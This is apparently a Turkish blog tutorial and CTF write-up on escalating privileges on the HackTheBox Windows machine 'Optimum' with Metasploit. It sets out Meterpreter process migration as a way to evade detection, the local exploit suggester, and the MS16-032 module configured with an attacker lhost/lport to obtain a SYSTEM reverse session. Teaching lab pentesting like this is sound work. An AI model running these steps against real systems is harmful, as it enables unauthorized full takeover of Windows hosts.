Bu yazımızda Metasploit ile Windows’ta Yetki Yükseltme (Adım Adım Rehber) inceleyeceğiz.
Giriş
Siber güvenlik ve pentest çalışmalarında, düşük ayrıcalıklı bir kullanıcı hesabıyla hedef sisteme erişim sağlamak sadece ilk adımdır. Önemli olan, bu erişimi kullanarak daha yüksek yetkiler elde etmek ve root/administrator kullanıcısı içerisine geçmektir.
Bu yazıda, Metasploit kullanarak bir Windows sisteminde nasıl yetki yükseltebileceğinizi, özellikle MS16-032 Secondary Logon Handle Exploit üzerinden SYSTEM seviyesine nasıl erişim sağlayabileceğinizi ve süreç taşımayı (migration) neden yaptığımızı ele alacağız.
Makine Bilgisi
- Platform: HackTheBox
- Makine İsmi: Optimum
Adım 1: Metasploit ile Hedef Sistemde Meterpreter Oturumu Oluşturma
Metasploit kullanarak hedef sistemde başarılı bir exploit çalıştırarak Meterpreter oturumu oluşturuyoruz. Bu, normal bir kullanıcı hesabıyla sisteme bağlanmamıza yardımcı olur. Oturum oluşturduktan sonra kullanıcı yetkilerini kontrol etmek için aşağıdaki komutu kullanabilirsiniz:
getuid parametresi ile baktığımızda kostas kullanıcısı içerisinde olduğumu görüyoruz.
OPTIMUM\kostas
Bu komut, mevcut oturumun hangi kullanıcıyla çalıştığını gösterir. Gördüğünüz gibi, administrator yetkisine ulaşmamız gerekiyor. Şu anda normal bir kullanıcı içerisindeyiz.
Adım 2: Süreçlerin Listelemesi ve Migration Neden Önemlidir?
Meterpreter oturumu başlattığımızda bağlantı genellikle kısa süreli olur. Bu süreçte firewall’lar bağlantıyı tespit edebilir veya bağlantı kopmaları yaşanabilir. Migration işlemi ile oturumu daha kararlı hale getiriyoruz.
Migration Nedir?
Migration, Meterpreter oturumunun bir süreçten başka bir sürece taşınması işlemidir. Bu işlem şu avantajları sağlar:
- Tespit Edilme Riskini Azaltır: Güvenlik duvarları tarafından tespit edilme olasılığını düşürür.
- Bağlantı Stabilitesini Artırır: Kesintisiz bağlantı sağlar ve yetki yükseltme işlemini kolaylaştırır.
En kararlı süreçlerden biri explorer.exe‘dir, çünkü Windows sistemlerinde bu işlem her zaman aktiftir.
Süreç Listeleme:
Süreçleri listelemek için aşağıdaki komutu kullanabilirsiniz:
Çıktıda sistemde çalışan tüm işlemleri göreceksiniz. Hedef süreci (ör. explorer.exe) seçip onun PID’sini (Process ID) kullanarak migration yapabilirsiniz. Örnek:
Adım 3: Yerel Exploit’leri Araştırma (Local Exploit Suggester Kullanımı)
Hedef sistemde kullanılabilecek yerel exploit’leri keşfetmek için Metasploit’in Local Exploit Suggester modülünü kullanabilirsiniz. Bu modül, sistemde mevcut zafiyetlere göre önerilerde bulunur.
Metasploit’in Local Exploit Suggester modülü ile hedef sistem için uygun olan yerel exploit’leri keşfedebilirsiniz:
- use post/multi/recon/local_exploit_suggester
- set session 1
- run
Bu modül, oturumun çalıştığı sistemde mevcut zafiyetlere karşılık gelen exploit’leri listeler. Çıktıda aşağıdaki gibi yetki yükseltme exploit’lerini görebilirsiniz:
- BypassUAC Exploitleri: bypassuac_eventvwr, bypassuac_sdclt, vb.
- CVE Tabanlı Exploitler: CVE-2019-1458, CVE-2020-0787, CVE-2021-40449, vb.
- MS16-032 Exploit’i: ms16_032_secondary_logon_handle_privesc
Buradan direkt kendi otomatik olarak sisteme göre exploiti tarıyor. Size kullanabileceğiz exploitleri veriyor.
Adım 4: MS16-032 Exploit ile Windows’ta Yetki Yükseltme
Bu yazıda MS16-032 exploit’ini kullanacağız. Bu exploit, Windows’un “Secondary Logon” hizmetindeki bir güvenlik açığını kullanır ve SYSTEM seviyesinde bir oturum oluşturur. Aşağıda yeşil olan sistemde 10 exploitte kullanılabilir.
Exploit Seçimi
use exploit/windows/local/ms16_032_secondary_logon_handle_privesc
Exploit Ayarlarının Yapılandırılması:
- set session 1
- set lhost 10.10.14.2
- set lport 9001
- run
Çıktıda, exploit’in başarılı bir şekilde çalıştığını ve Administrator (System) seviyesinde bir oturum oluşturulduğunu göreceksiniz.
Adım 5: Administrator Yetkisini Doğrulama (Metasploit Komutları)
SYSTEM seviyesine ulaşıldığını doğrulamak için şu komut kullanılır:
- meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
Adım 6: SYSTEM Yetkisi ile Çalışma ve Kontrol Sağlama
SYSTEM seviyesine ulaştıktan sonra, hedef sistem üzerinde tam kontrol sahibi oluyoruz.
Bu yazıda, Metasploit ile Windows’ta Yetki Yükseltme (Adım Adım Rehber) ele aldık. Özellikle MS16-032 exploit’i, Windows 7/8/8.1 ve Server 2008/2012 sistemlerinde hala etkili bir zafiyet olarak öne çıkmaktadır. Migration işleminin meterpreter oturumunun kararlılığını artırmak ve tespit riskini azaltmak için neden önemli olduğunu da gördük.
Uyarı: Bu yöntemler yalnızca yasal ve etik çerçeveler içinde kullanılmalıdır. İzinsiz sistemlere erişim veya exploit çalıştırma ciddi yasal sonuçlara yol açabilir. Bu bilgileri yalnızca eğitim ve CTF gibi yasal ortamlarda kullanın.